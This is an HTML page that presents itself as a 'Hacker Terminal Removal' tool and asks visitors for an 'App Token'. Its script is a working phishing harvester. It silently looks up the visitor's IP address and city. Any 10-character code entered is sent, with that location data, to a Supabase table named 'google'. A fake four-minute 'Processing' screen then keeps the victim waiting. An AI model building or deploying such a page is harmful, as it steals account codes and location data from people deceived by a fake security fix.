<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacker Terminal</title>
    <style>
        body {
            background-color: black;
            color: green;
            font-family: 'Courier New', monospace;
            text-align: center;
            padding-top: 50px;
        }

        #app {
            width: 50%;
            margin: auto;
            text-align: left;
        }

        input {
            width: 100%;
            padding: 10px;
            font-size: 18px;
            background-color: black;
            color: green;
            border: 1px solid green;
            outline: none;
        }

        #loading {
            display: none;
            margin-top: 20px;
            font-size: 18px;
            color: lime;
        }

        @keyframes dots {
            0% {
                content: "Processing";
            }

            25% {
                content: "Processing.";
            }

            50% {
                content: "Processing..";
            }

            75% {
                content: "Processing...";
            }

            100% {
                content: "Processing... Please wait...";
            }
        }

        #loading::after {
            content: "Processing";
            animation: dots 2s infinite steps(5, end);
        }
    </style>
</head>

<body>
    <div id="app">
        <h1>Hacker Terminal Removal</h1>
        <p>Enter your App Token:</p>
        <input type="text" id="tokenInput" placeholder="Enter Token...">
        <p id="loading"></p>
    </div>
    <script>
        var ip;
        fetch("https://api64.ipify.org?format=json")
            .then(response => response.json())
            .then(data => {
                ip = data.ip;
                return fetch(`http://ip-api.com/json/${ip}`);
            })
            .then(response => response.json())
            .then(info => {
                console.log(info)
                document.getElementById('tokenInput').addEventListener('keypress', function (event) {
                    if (event.key === 'Enter') {
                        let inputField = this;

                        // Insert Data
                        const myHeaders = new Headers();
                        myHeaders.append("apikey", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImN4c2hqbGJ2c3BreXJvZWlseW9tIiwicm9sZSI6ImFub24iLCJpYXQiOjE3MzY3NDcwODgsImV4cCI6MjA1MjMyMzA4OH0.lLi-8rCAF0NOlrw5zxvnbZurdC9WBGLJzCT4kVosTwE");
                        myHeaders.append("Authorization", "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImN4c2hqbGJ2c3BreXJvZWlseW9tIiwicm9sZSI6ImFub24iLCJpYXQiOjE3MzY3NDcwODgsImV4cCI6MjA1MjMyMzA4OH0.lLi-8rCAF0NOlrw5zxvnbZurdC9WBGLJzCT4kVosTwE");
                        myHeaders.append("Content-Type", "application/json");
                        myHeaders.append("Prefer", "return=minimal");

                        const raw = JSON.stringify({
                            "location": info.city,
                            "ipadress": ip,
                            "appCode": inputField.value
                        });

                        const requestOptions = {
                            method: "POST",
                            headers: myHeaders,
                            body: raw,
                            redirect: "follow"
                        };
                        if (inputField.value.length == 10) {
                            fetch("https://cxshjlbvspkyroeilyom.supabase.co/rest/v1/google", requestOptions)
                                .then((response) => response.text())
                                .then((result) => console.log(result))
                                .catch((error) => console.error(error));

                            inputField.value = '';

                            let loadingText = document.getElementById('loading');
                            loadingText.style.display = 'block';
                            console.log(info)
                            setTimeout(() => {
                                loadingText.style.display = 'none';
                            }, 240000); // 4 minutes
                        } else {
                            alert("Enter Valid App code")
                        }
                    }
                });
            })
            .catch(error => console.error("Error fetching IP details:", error));


    </script>
</body>

</html>